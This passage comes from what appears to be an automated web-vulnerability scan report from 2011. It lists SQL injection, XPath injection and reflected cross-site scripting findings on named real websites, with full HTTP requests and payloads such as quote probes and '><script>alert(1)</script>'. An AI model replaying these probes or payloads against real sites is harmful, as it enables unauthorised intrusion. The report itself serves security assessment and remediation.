...[SNIP]...

1.5. http://www.legalauthority.com/signup.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=iv24lnr1hgq1v3v7frs8feeh56; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56275

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
<br />Who says you can't find a needle in a haystack? With my Legal Authority mailing, I batted a thousand -- got one interview and one offer, and it was in entertainment law, which my Career Services Office said was almost impossible to break into!<br
...[SNIP]...

Request 2

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:59 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=0n342er2lguole8u76k04aslj2; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 57332

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.6. http://www.legalauthority.com/signup.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.legalauthority.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1'300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=uhv1dg441ua1fh8c45f4p5gkv0; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56502

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...
ct, I got an interview at a firm that I had never heard of before but does high-level trademark litigation. I was shocked. How could no one have known about this?!?!?! The salary they offered was also exceptional.

I owe my success to you, Legal Authority. Thank you!<br />
...[SNIP]...

Request 2

GET /signup.php?utm_source=JDJ&utm_medium=Banner&utm_campaign=Ebook_300x/1''300\ HTTP/1.1
Host: www.legalauthority.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: public
Pragma: no-cache
Set-Cookie: PHPSESSID=3vujbpe2tbuhdlnq0jn1ic6ff4; path=/; domain=.legalauthority.com
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 56632

                   
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Legal Recruiter, Law Student Job, Legal Employers, Legal Search Firm, Attorney Jobs . Legal Authority</title
...[SNIP]...

1.7. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music'/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:18 GMT
Connection: close

Request 2

GET /music''/albumreviews/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

1.8. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/albumreviews'/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:20 GMT
Connection: close

Request 2

GET /music/albumreviews''/low-country-blues-20110114 HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

1.9. http://www.rollingstone.com/music/albumreviews/low-country-blues-20110114 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.rollingstone.com
Path:   /music/albumreviews/low-country-blues-20110114

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /music/albumreviews/low-country-blues-20110114' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.3.3
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Server: Apache (Unix;)
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:24 GMT
Connection: close

Request 2

GET /music/albumreviews/low-country-blues-20110114'' HTTP/1.1
Host: www.rollingstone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
X-Powered-By: PHP/5.3.3
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Server: Apache (Unix;)
Content-Length: 18158
Vary: Accept-Encoding
Date: Sat, 22 Jan 2011 01:26:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   
...[SNIP]...

2. XPath injection
There are 3 instances of this issue:

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alphanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.


2.1. http://www.toyota.com/js/global/global.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js'/global/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:45 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

2.2. http://www.toyota.com/js/global/global.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global'/global.js HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:45 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

2.3. http://www.toyota.com/js/global/global.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /js/global/global.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /js/global/global.js' HTTP/1.1
Host: www.toyota.com
Proxy-Connection: keep-alive
Referer: http://www.toyota.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 21 Jan 2011 17:46:22 GMT
ETag: "3cb0a-2eb01-d40bf780"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 21 Jan 2011 19:27:46 GMT
Connection: close
Content-Length: 191233

/**
* Toyota.com global library include file. This file includes compressed versions of the following standard libraries:
*
* Prototype 1.6.1
* Script.aculo.us 1.8.3
* SWFObject 1.5
* SWFAddres
...[SNIP]...
";return{IE:!!window.attachEvent&&!A,Opera:A,WebKit:B.indexOf("AppleWebKit/")>-1,Gecko:B.indexOf("Gecko")>-1&&B.indexOf("KHTML")===-1,MobileSafari:/Apple.*Mobile.*Safari/.test(B)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var A=window.Element||window.HTMLElement;return !!(A&&A.prototype)})(),SpecificElementExtensions:(function(){if(
...[SNIP]...

3. Cross-site scripting (reflected)
There are 152 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://www.100kcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100kcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63f4"><script>alert(1)</script>34aed88ca0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f63f4"><script>alert(1)</script>34aed88ca0a=1 HTTP/1.1
Host: www.100kcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gpaaeq68r61sips9loiulpogp4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106183

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.100kcrossing.com/?f63f4"><script>alert(1)</script>34aed88ca0a=1">
...[SNIP]...

3.2. http://www.accountingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d95ab"><script>alert(1)</script>abb072a1742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d95ab"><script>alert(1)</script>abb072a1742=1 HTTP/1.1
Host: www.accountingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vii0tqv2bfu5e91l3g27pd6l20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountingcrossing.com/?d95ab"><script>alert(1)</script>abb072a1742=1">
...[SNIP]...

3.3. http://www.accountmanagementcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accountmanagementcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1a9f"><script>alert(1)</script>9bc7f776166 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d1a9f"><script>alert(1)</script>9bc7f776166=1 HTTP/1.1
Host: www.accountmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:24 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uue121nt18o8781h9829tgf502; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 137374

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.accountmanagementcrossing.com/?d1a9f"><script>alert(1)</script>9bc7f776166=1">
...[SNIP]...

3.4. http://www.actuarialcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actuarialcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fb17"><script>alert(1)</script>ddc746c442e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2fb17"><script>alert(1)</script>ddc746c442e=1 HTTP/1.1
Host: www.actuarialcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ri9tldvibqror27ls0q7hbaik2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114344

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.actuarialcrossing.com/?2fb17"><script>alert(1)</script>ddc746c442e=1">
...[SNIP]...

3.5. http://www.admincrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.admincrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c58e"><script>alert(1)</script>11c63536f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c58e"><script>alert(1)</script>11c63536f89=1 HTTP/1.1
Host: www.admincrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:37 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=49j0tdumr2co1irf1r26vht595; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:37 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:37 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109769

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.admincrossing.com/?3c58e"><script>alert(1)</script>11c63536f89=1">
...[SNIP]...

3.6. http://www.advertisingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.advertisingcrossing.com
Path:   /

Issue detail

